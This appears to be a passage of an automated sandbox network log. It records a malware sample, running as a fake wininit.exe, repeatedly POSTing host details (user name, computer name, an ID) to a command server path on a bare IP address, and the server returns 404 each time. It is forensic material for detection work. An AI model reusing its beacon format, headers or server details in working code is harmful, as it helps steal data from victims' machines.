                                                                                                                              Nov 20, 2024 10:57:40.390681982 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:41.132220984 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:41 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.45849994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:41.275645971 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:41.280822039 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:42.026184082 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:41 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.45850094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:42.189214945 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:42.194530010 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:42.950089931 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:42 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.45850194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:43.104093075 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:43.109049082 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:43.869158030 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:43 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.2.45850294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:44.028678894 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:44.036670923 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:44.776602983 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:44 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.2.45850394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:44.945676088 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:44.953135967 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:45.698539972 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:45 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.2.45850494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:45.856882095 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:45.861829042 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:46.613703012 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:46 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.2.45850594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:46.767010927 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:46.774216890 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:47.563374043 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:47 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.2.45850694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:47.721282005 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:47.730504036 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:48.461930990 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:48 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.2.45850794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:48.609719992 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:48.614778996 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:49.351393938 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:49 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.2.45850894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:49.513509989 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:49.520288944 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:50.260884047 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:50 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.2.45850994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:50.443767071 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:50.448704004 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:51.211325884 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:51 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.2.45851094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:51.373881102 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:51.379034996 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:52.132011890 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:52 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.2.45851194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:52.275599957 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:52.282630920 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:53.044281960 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:52 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.2.45851294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:53.196384907 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:53.201630116 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:53.951361895 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:53 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.2.45851394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:54.103605032 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:54.109455109 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:54.872958899 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:54 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.2.45851494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:55.028426886 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:55.033418894 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:55.757050991 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:55 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.2.45851594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:56.034521103 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:56.039529085 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:56.796859026 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:56 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
